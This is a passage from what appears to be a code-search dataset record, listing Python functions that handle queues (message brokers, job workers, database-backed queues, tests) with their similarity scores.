BY create_date ASC limit 1\"\"\"\n self._cr.execute(query)\n product_data_queue_id = self._cr.fetchone()\n product_data_queue_line_ids = self.env['shopify.product.data.queue.ept'].browse(product_data_queue_id).product_data_queue_lines\n product_data_queue_line_ids.process_product_queue_line_data()", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def run(self, to_process, duplicates):\n self.db_m = database_manager.DatabaseManager(self.settings)\n try:\n # Process queue while is not empty\n while True:\n data = to_process.get(True, 1)\n duplicate_count = self.consume_data(data)\n with duplicates.get_lock():\n duplicates.value += duplicate_count\n except queue.Empty:\n pass", "def run(self):\n\n def callback(ch, method, properties, body):\n json_body = json.loads(body)\n self.buffer.append(Fvalue.fromdict(json_body))\n\n sleep(5) # We introduce a slight delay to let the RabbitMQ container to accept connections\n connection = pika.BlockingConnection(pika.ConnectionParameters(host=self.mq_host,port=self.mq_port))\n channel = connection.channel()\n channel.exchange_declare(exchange=self.mq_host + '_exchange', exchange_type='direct')\n result = channel.queue_declare(exclusive=True)\n queue_name = result.method.queue\n channel.queue_bind(exchange=self.mq_host + '_exchange',\n queue=queue_name,\n routing_key=self.routing_key)\n channel.basic_consume(callback,queue=queue_name,no_ack=True)\n channel.start_consuming()", "def q_mgr(HyS, HyQ):\r\n q_file = os.path.join(HyS.var_dir, 'Queue.txt')\r\n while True:\r\n run = ''\r\n lines = open(q_file, 'r').readlines()\r\n if lines:\r\n run = lines[0].rstrip()\r\n open(q_file, 'w').writelines(lines[1:])\r\n if run:\r\n HyQ.put(run)\r\n else:\r\n break\r\n return True", "def update_one_queue(queue):\n conn = pbs.pbs_connect(queue.server.name.encode('iso-8859-1', 'replace'))\n if conn==-1:\n logging.error(\"Cannot connect to %s - live data will be missing\" % server.name)\n return\n statqueues = pbs.pbs_statque(conn, queue.name.encode('iso-8859-1', 'replace') , [], \"\")\n pbs.pbs_disconnect(conn)\n if len(statqueues)==0:\n logging.error(\"pbs_statque failed for queue: %s\" % queue.name)\n return\n if len(statqueues)>1:\n logging.warning(\"pbs_statque returned more than one records for queue: %s\" % queue.name)\n\n attr_dict = dict([ (x.name,x.value) for x in statqueues[0].attribs])\n update_one_queue_from_pbs_data(queue, attr_dict)\n queue.save()", "def queue_parse():\n if not check_api_auth():\n abort(401) # Unauthorized.\n\n # Get the scan_result from the query.\n try:\n # Grab the data from the body of the request\n scan_result = request.data.decode('utf-8')\n # Add the data to the queue\n new_parse = ParseQueue()\n new_parse.parse_data = scan_result\n with open('/tmp/%i' + time.strftime(\"%Y%m%d-%H%M%S\"), 'w') as f:\n f.write(json.dumps(json.loads(scan_result), indent=4))\n db.session.add(new_parse)\n 
db.session.commit()\n parse_scan.apply_async(args=[new_parse.id])\n return json.dumps({\"status\": \"success\"})\n except:\n # Could not load the scan_result from the query.\n db.session.rollback()\n abort(400) # Bad request.", "def pull(self):", "def run(self):\n\t\tlogger.info(\"Uploading data... @ %f, PID: %d\" % (time.time(), os.getpid()))\n\n\t\tself.dump_db()", "def _get_data(self):\n while True:\n # self.logger.debug(\"data queue size is: {}\".format(len(self._dataqueue)))\n ans = self._parser.find_first_packet(self._dataqueue[:])\n if ans:\n self._dataqueue = ans[1]\n # self.logger.debug(\"found packet of size {}\".format(len(ans[0])))\n return ans[0]\n else:\n # self.logger.debug(\"Could not find packet in received data\")\n tmp = self.conn.recv(1024)\n self._dataqueue += tmp", "def process_queue(self, queue):\n\n while queue:\n deferred, data = queue.popleft()\n deferred.callback(data)", "def pop_message(self):\n app_process = sqlite3.connect('app_process::memory:', check_same_thread=False)\n app_process_cursor = app_process.cursor()\n app_process_cursor.execute(\"SELECT * FROM message_queue WHERE tstamp==(:first)\", {\"first\":self.mq_first}) \n item = app_process_cursor.fetchone()\n if item == None:\n return\n app_process_cursor.execute(\"DELETE FROM message_queue WHERE tstamp==(:first)\", {\"first\":self.mq_first})\n self.mq_first = item[4] #now sets first to next item pointed to\n app_process.commit()\n app_process.close()\n return item", "def _pull_batch_from_queue(self):\n rollout = self.explorer.queue.get( timeout = 600.0 )\n while not rollout.terminal:\n try: \n rollout.extend( self.explorer.queue.get_nowait() )\n except queue.Empty:\n break\n print(rollout.size())\n return rollout", "def enqueue(self,e):", "def process_amqp_events(self):\n self.connection.process_data_events()", "def put_data(self, id, data):\n self.msg_queue.put(data)", "def get(self):\n return dumps(AQ.queue()), 200", "def __init__(self):\n self.queue = Queue()", "def __init__(self):\n self._queue_items = []", "def get_data(self):\n try:\n data = self._queue.get(block=False)\n except Empty:\n data = None\n return data", "def get_queue_data():\n global grove_data\n try:\n grove_data = grove_queue.get_nowait()\n except Empty:\n # Just use old loopstate if queue is empty\n pass\n return grove_data", "def process_twitter_data(worker_id, queue, module_name, source):\n\n logger = logging.getLogger(LOGGING_ROOT_NAME + '.processor.' 
+ str(worker_id))\n logger.debug(\"Worker\" + str(worker_id) + \" looking for data...\")\n\n db_access = MongoDBUtils()\n\n while True:\n data = queue.get()\n if 'text' in data:\n # Guarda el Tweet\n db_access.save_tweet(data, source)\n #print data\n print \"Tweet guardado...\"\n logger.debug('TWEET | id: ' + str(data['id']) + ': ' + data['text'].encode('utf-8'))\n elif 'delete' in data:\n logger.debug('DELETION NOTICE | ' + str(data).encode('utf-8'))\n elif 'warning' in data:\n logger.debug('STALL WARNING | ' + str(data).encode('utf-8'))\n elif 'limit' in data:\n logger.debug('LIMIT NOTICE | ' + str(data).encode('utf-8'))\n elif 'disconnect' in data:\n logger.debug('DISCONNECTION MESSAGE | ' + str(data).encode('utf-8'))\n elif 'status_withheld' in data:\n logger.debug('STATUS WITHHELD | ' + str(data).encode('utf-8'))\n elif 'user_withheld' in data:\n logger.debug('USER WITHHELD | ' + str(data).encode('utf-8'))\n else:\n logger.debug('PRETTY ODD | Data: ' + str(data))\n\n queue.task_done()", "def __init__(self):\n self._data_queue = []\n self._access_queue_lock = Lock()", "def run():\r\n num_workers = g.num_query_queue_workers\r\n wq = WorkQueue(num_workers = num_workers)\r\n wq.start()\r\n\r\n while True:\r\n job = None\r\n #limit the total number of jobs in the WorkQueue. we don't\r\n #need to load the entire db queue right away (the db queue can\r\n #get quite large).\r\n if len(running) < 2 * num_workers:\r\n with running_lock:\r\n iden, pickled_cr = get_query()\r\n if pickled_cr is not None:\r\n if not iden in running:\r\n running.add(iden)\r\n job = make_query_job(iden, pickled_cr)\r\n wq.add(job)\r\n\r\n #if we didn't find a job, sleep before trying again\r\n if not job:\r\n time.sleep(1)", "def add_to_send_queue(self, data):\n if self.socket is not None:\n self.send_queue.put(data)", "def test_the_queue_enqueue(the_queue):\n the_queue.enqueue(2)\n assert the_queue._new_dll.head.data == the_queue._new_dll.tail.data == 2", "def add_to_queue(self, msg):\n if not self.queue.full():\n self.queue.put(msg)", "def add_queue(self, queue):\n with self.mutex:\n self.queues.append(queue)", "def get_data(queue, item_count):\n return [loads(queue.get()) for _ in range(item_count)]", "def data_generator():\n msg = Message(Message.ADD, queue.uuid, queue)\n PROVIDER_MQ.put(msg)\n keep_running = True\n while keep_running:\n try:\n chunk = queue.get()\n yield chunk\n except Empty:\n app.logger.info('Queue empty. Ending stream')\n keep_running = False", "def queueStatusAll():", "def ztest_tokyo_queue(self):\n \n sql_queue = TokyoCabinetQueue()\n \n print(\"Queue size = %d\\n\" %(sql_queue.size()) )\n \n #insertion\n for i in range(10):\n if i % 2 == 0:\n p = 0\n else:\n p = 1\n item = NMSQueueItem(p,\"data %s\" % (i))\n item.set_uuid()\n sql_queue.put(item.dictify())\n #time.sleep(0.5)\n \n size = sql_queue.size()\n \n while size != 0:\n the_dict = sql_queue.pop()\n item = NMSQueueItem.create_from_dict(the_dict)\n print(\"size = %d, item = %s\\n\" % (size, item))\n size = sql_queue.size()\n \n print(\"size = %s\" % size )", "def enqueue(self, data, flag='process'):\n self.Q['in'].put((data, flag))", "def _push_data_to_learner(self, data_queue):\n raise NotImplementedError", "def populatereadyqueue():\n readyQueue.put(Process(\"P1\", time(0, 0, 1), time(0, 0, 4)))\n readyQueue.put(Process(\"P2\", time(0, 0, 2), time(0, 0, 6)))\n readyQueue.put(Process(\"P3\", time(0, 0, 3), time(0, 0, 2)))", "def _drain_queue(self):\n while self.queue:\n self._export_batch()" ]
[ "0.6866185", "0.6528412", "0.65014994", "0.6360959", "0.6359229", "0.6332785", "0.6331364", "0.63042796", "0.62166846", "0.621502", "0.6206312", "0.618142", "0.61665404", "0.6134651", "0.61273587", "0.61071765", "0.6074403", "0.60732526", "0.6055935", "0.6055481", "0.60451365", "0.60388917", "0.60382074", "0.6038119", "0.6025687", "0.6020988", "0.60091877", "0.5973509", "0.59556293", "0.59497714", "0.594634", "0.594634", "0.59394556", "0.59237266", "0.59226185", "0.59195524", "0.5909843", "0.5890745", "0.5890745", "0.5890745", "0.5890745", "0.5890745", "0.5878202", "0.58695644", "0.5865342", "0.5851911", "0.584633", "0.5841693", "0.5841693", "0.5827866", "0.5823142", "0.5815476", "0.58141327", "0.58141327", "0.58141327", "0.58141327", "0.58141327", "0.58141327", "0.58141327", "0.58141327", "0.58141327", "0.58141327", "0.58141327", "0.58141327", "0.58141327", "0.58141327", "0.58141327", "0.5812663", "0.58063555", "0.57995206", "0.5799422", "0.5799236", "0.57920575", "0.5791401", "0.578701", "0.5769021", "0.57560354", "0.5748083", "0.57386625", "0.5736158", "0.5734419", "0.5732206", "0.5729424", "0.5726838", "0.57254964", "0.5720633", "0.5719781", "0.5714445", "0.5713835", "0.5705625", "0.5703547", "0.56974953", "0.5691603", "0.56757826", "0.56570953", "0.5654848", "0.5641112", "0.5615507", "0.5609424", "0.5604924", "0.56025857" ]
0.0
-1
Check GMail E.g. messages,unseen = imap.check_gmail('username.com','password')
def check_gmail(username, password):
    i = imaplib.IMAP4_SSL('imap.gmail.com')
    try:
        i.login(username, password)
        x, y = i.status('INBOX', '(MESSAGES UNSEEN)')
        messages = int(re.search('MESSAGES\s+(\d+)', y[0]).group(1))
        unseen = int(re.search('UNSEEN\s+(\d+)', y[0]).group(1))
        return messages, unseen
    except:
        return False, 0
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def checkEmail():\n\tpop_conn = poplib.POP3_SSL('pop.gmail.com')\n\tpop_conn.user('')\n\tpop_conn.pass_('')\n\t#Get messages from server:\n\tmessages = [pop_conn.retr(i) for i in range(1, len(pop_conn.list()[1]) + 1)]\n\t# Concat message pieces:\n\tmessages = [\"\\n\".join(mssg[1]) for mssg in messages]\n\t#Parse message intom an email object:\n\tmessages = [parser.Parser().parsestr(mssg) for mssg in messages]\n\tflag = 0\n\tsweep = None\n\tfor message in messages:\n\t\tsubject = message['subject']\n\t\tif subject is None:\n\t\t\tcontinue\n\t\telif \"CommenceSweep:\" in subject:\n\t\t\tstart = subject.find(\":\")\n\t\t\tcommand = subject[start+1:]\n\t\t\tprint command\n\t\t\tif \"Comp\"+sys.argv[1] in command:\n\t\t\t\tstart = command.find(\"-\")\n\t\t\t\tsweep = command[start+1:]\n\t\t\t\tprint sweep\n\t\t\t\tpoplist = pop_conn.list()\n\t\t\t\tmsglist = poplist[1]\n\t\t\t\tfor msgspec in msglist:\n\t\t\t\t\tdelete = int(msgspec.split(' ')[0])\n\t\t\t\t\tpop_conn.dele(delete)\n\t\t\t\tflag = 1\n\tpop_conn.quit()\n\treturn flag, sweep", "def check_email():\n server = smtplib.SMTP(\"smtp.gmail.com\", 587)\n server.ehlo()\n server.starttls()\n server.ehlo()\n server.login(user, password)\n\n g = gmail.login(user, password)\n\n # Check for unread messages.\n unread = g.inbox().mail(unread=True)\n\n # Submit a job to lint each email sent to editor@proselint.com. Record the\n # resulting job_ids somewhere (in Redis, I suppose), keyed by a hash of the\n # email.\n for u in unread:\n\n u.fetch()\n\n signature = (u.fr.decode('utf-8') +\n u.subject.decode('utf-8') +\n u.body.decode('utf-8'))\n\n hash = hashlib.sha256(signature.encode('utf-8')).hexdigest()\n\n if user_to in u.to or user_to in u.headers.get('Cc', []):\n\n job_id = conn.get(hash)\n\n if not job_id:\n # If the email hasn't been sent for processing, send it.\n r = requests.post(api_url, data={\"text\": u.body})\n conn.set(hash, r.json()[\"job_id\"])\n print(\"Email {} sent for processing.\".format(hash))\n\n else:\n # Otherwise, check whether the results are ready, and if so,\n # reply with them.\n r = requests.get(api_url, params={\"job_id\": job_id})\n\n if r.json()[\"status\"] == \"success\":\n\n reply = quoted(u.body)\n errors = r.json()['data']['errors']\n reply += \"\\r\\n\\r\\n\".join([json.dumps(e) for e in errors])\n\n msg = MIMEMultipart()\n msg[\"From\"] = \"{} <{}>\".format(name, user)\n msg[\"To\"] = u.fr\n msg[\"Subject\"] = \"Re: \" + u.subject\n\n if u.headers.get('Message-ID'):\n msg.add_header(\"In-Reply-To\", u.headers['Message-ID'])\n msg.add_header(\"References\", u.headers['Message-ID'])\n\n body = reply + \"\\r\\n\\r\\n--\\r\\n\" + tagline + \"\\r\\n\" + url\n msg.attach(MIMEText(body, \"plain\"))\n\n text = msg.as_string()\n server.sendmail(user, u.fr, text)\n\n # Mark the email as read.\n u.read()\n u.archive()\n\n print(\"Email {} has been replied to.\".format(hash))", "def check_for_new_data():\n SCOPES = ['https://mail.google.com/']\n creds = None\n # The file token.json stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.json'):\n creds = Credentials.from_authorized_user_file('token.json', SCOPES)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file('creds_4.json', SCOPES)\n creds = 
flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open('token.json', 'w') as token:\n token.write(creds.to_json())\n\n service = build('gmail', 'v1', credentials=creds)\n stamp = int(time.time()) - 3600\n # Call the Gmail API\n results = service.users().messages().list(userId='me',q=f\"from:notify@google.com after:{stamp}\").execute()\n if results[\"resultSizeEstimate\"] > 0:\n populate_database()", "def main():\r\n credentials = get_credentials()\r\n http = credentials.authorize(httplib2.Http())\r\n service = discovery.build('gmail', 'v1', http=http)\r\n\r\n response = service.users().messages().list(userId=USER_ID, labelIds=[\"SPAM\"]).execute()\r\n messages = []\r\n if 'messages' in response:\r\n messages.extend(response['messages'])\r\n\r\n while 'nextPageToken' in response:\r\n page_token = response['nextPageToken']\r\n response = service.users().messages().list(userId=USER_ID, labelIds=[\"SPAM\"], pageToken=page_token).execute()\r\n messages.extend(response['messages'])\r\n\r\n i = 0\r\n for message in messages:\r\n msg_id = message[\"id\"]\r\n message = service.users().messages().get(userId=USER_ID, id=msg_id).execute()\r\n for prop in message[\"payload\"][\"headers\"]:\r\n if prop[\"name\"] == \"From\":\r\n print(\"ID:\", i, \"\\tFrom:\", prop[\"value\"].encode('ascii','replace'), end=\"\\t\")\r\n elif prop[\"name\"] == \"Subject\":\r\n print(\"Subject:\", prop[\"value\"].encode('ascii','replace'))\r\n i += 1\r\n\r\n to_keep = raw_input(\"Do you want to keep any emails? [N / 0,1,...] \")\r\n if \",\" in to_keep:\r\n to_keep = to_keep.split(\",\")\r\n for i in range(len(to_keep)):\r\n to_keep[i] = int(to_keep[i])\r\n elif to_keep != \"N\":\r\n to_keep = [int(to_keep)]\r\n\r\n if isinstance(to_keep, list):\r\n for i in range(len(to_keep)-1,-1,-1):\r\n msg_labels = {'removeLabelIds': [\"SPAM\"], 'addLabelIds': [\"INBOX\"]}\r\n msg_id = messages[to_keep[i]][\"id\"]\r\n message = service.users().messages().modify(userId=USER_ID, id=msg_id, body=msg_labels).execute()\r\n del messages[to_keep[i]]\r\n\r\n # ANe1BmiDP-rAoJSwkw8T119UU0Z7oisOlVJ4xQ\r\n # filter0 = service.users().settings().filters().get(userId=USER_ID, id=\"ANe1BmiDP-rAoJSwkw8T119UU0Z7oisOlVJ4xQ\").execute()\r\n # print(filter0)\r\n\r\n for message in messages:\r\n msg_id = message[\"id\"]\r\n # for prop in message[\"payload\"][\"headers\"]:\r\n # if prop[\"name\"] == \"From\":\r\n # start_email = prop[\"value\"].find(\"<\")\r\n # end_email = prop[\"value\"].find(\">\", start_email + 1)\r\n # email_address = prop[\"value\"][start_email + 1:end_email]\r\n # filter0[\"criteria\"][\"from\"] = filter0[\"criteria\"][\"from\"] + \" OR \" + email_address\r\n service.users().messages().delete(userId=USER_ID, id=msg_id).execute()\r\n\r\n # service.users().settings().filters().delete(userId=USER_ID, id=\"ANe1BmiDP-rAoJSwkw8T119UU0Z7oisOlVJ4xQ\").execute()\r\n # service.users().settings().filters().create(userId=USER_ID, body=filter0).execute()\r\n print(\"All Spam Deleted!\")", "def main():\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first time.\n scores = {} # scores is an empty dict already\n\n if os.path.getsize('token.pickle') > 0: \n with open('token.pickle', \"rb\") as f:\n unpickler = pickle.Unpickler(f)\n # if file is not empty scores will be equal\n # to the value unpickled\n scores = unpickler.load()\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as 
token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n # Starts Gmail V1 with logged in user\n service = build('gmail', 'v1', credentials=creds)\n \n# ================================================================================== \n\n\n # MAIL CHECKHER ================================================================\n\n # get mails via gmail api\n results = service.users().messages().list(userId='me', labelIds=['INBOX']).execute()\n messages = results.get('messages', [])\n\n # mail number\n mail_nr = 0\n\n # variabel for how many mails we want to search through\n message_count = int(input(\"Hur många mails vill du söka igenom? \"))\n # if 0 mails are chosen\n if not messages:\n print('Inga mail i inkorgen')\n else:\n # looks through the email inbox for mails \"message_count\" amount of times\n for message in messages[:message_count]:\n # gets the email id's in full format so we can extraqct information via the gmail api\n msg = service.users().messages().get(userId='me', id=message['id'], format='full', metadataHeaders=None).execute()\n # gets the headers of the email in a variable\n headers = msg[\"payload\"][\"headers\"]\n # from headers gets the sender email, who it was from \n from_ = [i['value'] for i in headers if i[\"name\"]==\"From\"]\n # from headers gets the subject of the email\n subject = [i['value'] for i in headers if i[\"name\"]==\"Subject\"]\n # keeps count of the current email\n mail_nr += 1\n # if the email is from the security system email print it's information\n if from_ == ['Python Ormarna <python.ormar@gmail.com>'] or from_ == ['python.ormar@gmail.com']:\n # gets the email in raw format via gmail api\n rawmsg = service.users().messages().get(userId=\"me\", id=message[\"id\"], format=\"raw\", metadataHeaders=None).execute()\n print(\"=\"*100)\n print(\"\\nMail:\", mail_nr)\n print(\"Detta mail är från erat säkerhetssystem\")\n # variable the UNIX time of when the email was sent\n datum = int(msg['internalDate'])\n datum /= 1000\n # prints the date and time when the email was revived in local y/m/d/h/m/s\n print(\"Mottaget:\", datetime.fromtimestamp(datum).strftime('%Y-%m-%d %H:%M:%S'))\n print(\"Från:\", from_)\n print(\"Ämne:\", subject)\n # prints a snippet from the email\n print(msg['snippet'])\n print(\"\\n\")\n else:\n print(\"=\"*100)\n print(\"\\nMail:\", mail_nr)\n print(\"Detta mail är INTE från erat säkerhetssystem\\n\")\n time.sleep(1)\n print(\"Inga fler mail hittades\")", "def main():\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with 
open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n service = build('gmail', 'v1', credentials=creds)\n\n user_id = 'me'\n label_id_one = 'INBOX'\n label_id_two = 'UNREAD'\n\n # Call the Gmail API\n results = service.users().labels().list(userId='me').execute()\n labels = results.get('labels', [])\n unread_msgs = service.users().messages().list(userId='me',labelIds=[label_id_one, label_id_two]).execute()\n mssg_list = unread_msgs['messages']\n print (\"Total unread messages in inbox: \", str(len(mssg_list)))\n final_list = [ ]\n\n for mssg in mssg_list:\n temp_dict = { }\n m_id = mssg['id'] # get id of individual message\n message = service.users().messages().get(userId=user_id, id=m_id).execute() # fetch the message using API\n payld = message['payload'] # get payload of the message \n headr = payld['headers'] # get header of the payload\n\n\n for one in headr: # getting the Subject\n if one['name'] == 'Subject':\n msg_subject = one['value']\n temp_dict['Subject'] = msg_subject\n else:\n pass\n\n\n for two in headr: # getting the date\n if two['name'] == 'Date':\n msg_date = two['value']\n date_parse = (parser.parse(msg_date))\n m_date = (date_parse.date())\n temp_dict['Date'] = str(m_date)\n else:\n pass\n\n for three in headr: # getting the Sender\n if three['name'] == 'From':\n msg_from = three['value']\n temp_dict['Sender'] = msg_from\n else:\n pass\n\n temp_dict['Snippet'] = message['snippet'] # fetching message snippet\n\n\n try:\n \n # Fetching message body\n mssg_parts = payld['parts'] # fetching the message parts\n part_one = mssg_parts[0] # fetching first element of the part \n part_body = part_one['body'] # fetching body of the message\n part_data = part_body['data'] # fetching data from the body\n clean_one = part_data.replace(\"-\",\"+\") # decoding from Base64 to UTF-8\n clean_one = clean_one.replace(\"_\",\"/\") # decoding from Base64 to UTF-8\n clean_two = base64.b64decode (bytes(clean_one, 'UTF-8')) # decoding from Base64 to UTF-8\n soup = BeautifulSoup(clean_two , \"lxml\" )\n mssg_body = soup.body()\n # mssg_body is a readible form of message body\n # depending on the end user's requirements, it can be further cleaned \n # using regex, beautiful soup, or any other method\n temp_dict['Message_body'] = mssg_body\n\n except :\n pass\n\n print (temp_dict)\n final_list.append(temp_dict) # This will create a dictonary item in the final list\n return final_list[:3]\n # This will mark the messagea as read\n #service.users().messages().list(userId=user_id, id=m_id,body={ 'removeLabelIds': ['UNREAD']}).execute() \n\n\n if not labels:\n print('No labels found.')\n else:\n print('Labels:')\n for label in labels:\n print(label['name'])", "def main():\n \n ####GET ALL MESSAGES FROM GMAIL###\n # gmail_usr_name = raw_input(\"Enter the gmail user name: \\n\")\n # gmail_passwrd = getpass.getpass(\"Enter the Gmail password: \\n\")\n print(\"Please wait while message IDs for Gmail are populated...\")\n gmail_accumulator = Accumulator.Accumulator(GMAIL_PATH, \"usr_name\", \"passwrd\",\n IMAP_PORT, GMAIL_FOLDER)\n gmail_msg_ids = gmail_accumulator.get_ids()\n pprint.pprint(gmail_msg_ids)\n \n ####GET ALL MESSAGES FROM IMAP###\n #IMAP2_usr_name = raw_input(\"Enter the IMAP2 user name: \\n\")\n #IMAP2_passwrd = getpass.getpass(\"Enter the IMAP2 password: \\n\")\n print(\"Please wait while message IDs for IMAP are populated\")\n \n IMAP2_accumulator = Accumulator.Accumulator(\"imap2.lbl.gov\", \"usr_name\", \"passwrd\",\n IMAP_PORT, IMAP2_FOLDER)\n IMAP2_msg_ids = 
IMAP2_accumulator.get_ids()\n pprint.pprint(IMAP2_msg_ids)\n \n gmail_unique_ids = gmail_accumulator.get_unique_ids()\n ###FIND THE DIFFERENCES BETWEEN IMAP AND GMAIL.####\n compare_ids = Comparator.Comparator(IMAP2_msg_ids, gmail_unique_ids)\n diff_ids = compare_ids.compare()\n \n ###FIND THE DUPLICATE IDs FROM IMAP2.###\n \n dups = IMAP2_accumulator.get_duplicate_ids()\n dup_headers = header_info(dups, IMAP2_accumulator)\n print(\"{num_msgs} messages in IMAP2/{fldr}\\n\".format(num_msgs = IMAP2_accumulator.count_ids(), fldr = IMAP2_accumulator.folder))\n print(\"{num_msgs} messages in GMAIL/{fldr}\\n\".format(num_msgs = gmail_accumulator.count_ids(), fldr = gmail_accumulator.folder))\n \n print(\"-------------------------------------------------------------------------------------\")\n print(\"There are {num} messages in IMAP2/{fldr1} which are not in Gmail/{fldr2}\\n\".format(num = len(diff_ids),\n fldr1 = IMAP2_accumulator.folder,\n fldr2 = gmail_accumulator.folder))\n print(\"--------------------------------------------------------------------------------------\")\n pprint.pprint(diff_ids)\n\n print(\"Here is a list of the headers of each message ID which is not in Gmail:\\n\")\n headers = header_info(diff_ids, IMAP2_accumulator)\n\n ###print a table of the info of the missing messages.###\n table = prettytable.PrettyTable([\"TO\", \"FROM\", \"SUBJECT\"])\n table.align[\"TO\"] = \"l\"\n table.padding_width = 1\n for hdr in headers:\n table.add_row(hdr)\n print(table)\n\n\n ###write the output to OUTPUT_FILE.###\n\n output_file = open(OUTPUT_FILE, 'w')\n output_file.write(\"\\n\")\n output_file.write(\"{num_msgs} messages in IMAP2/{fldr}\\n\".format(num_msgs = IMAP2_accumulator.count_ids(), fldr = IMAP2_accumulator.folder))\n output_file.write(\"{num_msgs} messages in GMAIL/{fldr}\\n\".format(num_msgs = gmail_accumulator.count_ids(), fldr = gmail_accumulator.folder))\n output_file.write(\"There are {num} messages in IMAP2/{fldr1} which are not in Gmail/{fldr2} \\n\".format(num = len(diff_ids),\n fldr1 = IMAP2_accumulator.folder,\n fldr2 = gmail_accumulator.folder))\n output_file.write(\"Here is a list of the headers of each message ID which is not in Gmail:\\n\")\n for ids in diff_ids:\n output_file.write(str(ids))\n output_file.write(\"\\n\")\n output_file.write(\"\\n\")\n\n ###OUUTPUT THE TABLE###\n\n output_file.write(str(table)) \n output_file.write(LINE_SEPARATOR)\n\n output_file.close()\n\n ucb.interact()", "def gmail(screen):\n\n\n credentials = get_credentials()\n http = credentials.authorize(httplib2.Http())\n service = discovery.build('gmail', 'v1', http=http)\n\n results = service.users().labels().list(userId='me').execute()\n labels = results.get('labels', [])\n\n\n\n if not labels:\n print('No labels found.')\n else:\n if PRINT_CATEGORY: print('Labels:')\n for label in labels:\n if PRINT_CATEGORY: print(label['name'])\n if label['name']=='UNREAD':\n listMessages = ListMessagesWithLabels(service, 'me', label['name'])\n nbMessages = len(listMessages)\n nbMess = 0\n\n printTerminal('ENZO! Tu as ['+str(nbMessages)+'] messages non lus.',True)\n say('ENZO! 
Tu as: '+str(nbMessages)+' messages non lus.')\n\n for message in listMessages:\n #print(GetMessage(service, 'me', message['id'], False))\n nbMess+=1\n ggMessage = GetMessage(service, 'me', message['id'], False)\n #print(ggMessage)\n\n #msg_str = base64.urlsafe_b64decode(ggMessage['raw'].encode('ASCII'))\n #print(msg_str)\n\n for header in ggMessage['payload']['headers']:\n #print(header)\n if header['name']=='Subject':\n #unicode(text,'utf-8')\n #screen.addstr(0,1,\"\")\n if screen:\n screen.addstr(str(nbMess)+'] '+header['value'])\n say(header['value'])\n screen.refresh()\n else:\n print(str(nbMess)+'] '+header['value'])\n say(header['value'])\n #TTS(header['value'],'french', 50 ,2 )\n #status=subprocess.call([\"espeak\",\"-s 100 -v fr \",header['value']], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n\n #for part in ggMessage['payload']['parts']:\n # msg = base64.urlsafe_b64decode(part['body']['data'].encode('ASCII'))\n # print(removehtml(msg))\n #print(part['body']['data'])\n #say(part['body']['data'])\n if len(sys.argv) > 1:\n if sys.argv[1]=='-t':\n TTS(ggMessage,'french', 50 ,2 )\n #for toto in label:\n # print(toto)", "def verify_email(nickname, quiet):\n\n try:\n account = Account.query.filter_by(nickname=nickname).one()\n except NoResultFound:\n print(f\"Account {nickname} not found\")\n return\n gmail = GmSync.from_account(account, load_config(not quiet))\n gmail.verify()", "def main():\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n service = build('gmail', 'v1', credentials=creds)\n\n # Call the Gmail API\n results = service.users().labels().list(userId='me').execute()\n labels = results.get('labels', [])\n\n if not labels:\n print('No labels found.')\n else:\n print('Labels:')\n for label in labels:\n print(label['name'])\n path = \"./ham\"\n try:\n os.mkdir(path)\n except OSError:\n print (\"Creation of the directory %s failed\" % path)\n else:\n print (\"Successfully created the directory %s \" % path)\n\n messages = []\n messages = ListMessagesMatchingQuery(service, 'me', 'in:inbox')\n idx = 0\n for message in messages:\n GetMimeMessage(service, 'me', message['id'], idx)\n idx+=1", "def connect():\n\n mailBox = IMAP4_SSL('imap.gmail.com')\n\n if TESTING:\n mailBox.login(\"sapphirephoenix\", getpass.getpass())\n else:\n mailBox.login(raw_input(\"\\nUsername: \"), getpass.getpass())\n\n result, data = mailBox.select('INBOX', True) # INBOX [Gmail]/All Mail\n\n if result == \"OK\":\n print \"\\n* Connected to mailbox! *\\n\"\n else:\n print \"\\nERROR: Could not connect to mailbox\\n\"\n print \"\\n* Exiting... 
